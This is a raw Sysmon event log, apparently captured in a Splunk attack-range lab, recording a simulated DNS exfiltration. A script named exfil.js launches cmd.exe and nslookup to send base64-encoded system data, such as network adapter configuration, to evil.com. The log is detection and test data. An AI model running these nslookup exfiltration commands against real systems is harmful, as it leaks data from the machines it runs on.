14:16:44.994{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-F241-000000005F02}608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.994{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-F241-000000005F02}608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043956Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:45.922{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4414504C3D20505B331448BE8E0929D5,SHA256=F0120690EA7588E81FDC38B13A3946CACF62E5B832A18EC9A79ED7743C241BFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.979{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-3142-000000005F02}8028C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.979{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-3142-000000005F02}8028C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.979{2E1864BB-17CE-629A-3142-000000005F02}80285472C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-3042-000000005F02}7944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-3142-000000005F02}8028C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-3042-000000005F02}7944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-17A1-629A-783D-000000005F02}55527196C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-3042-000000005F02}7944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.963{2E1864BB-17CE-629A-3042-000000005F02}7944C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldtwi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.958{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdxqj.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-17CE-629A-2E42-000000005F02}73566676C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2F42-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2F42-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.910{2E1864BB-17CE-629A-2D42-000000005F02}46407688C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-2F42-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.915{2E1864BB-17CE-629A-2F42-000000005F02}5516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-2D42-000000005F02}4640C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdxqj.tmp 2>&1 10341000x8000000000000000204723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.879{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2E42-000000005F02}7356C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.879{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2E42-000000005F02}7356C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.879{2E1864BB-17CE-629A-2E42-000000005F02}73566676C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2D42-000000005F02}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2E42-000000005F02}7356C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2D42-000000005F02}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.863{2E1864BB-17A1-629A-783D-000000005F02}55528060C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-2D42-000000005F02}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32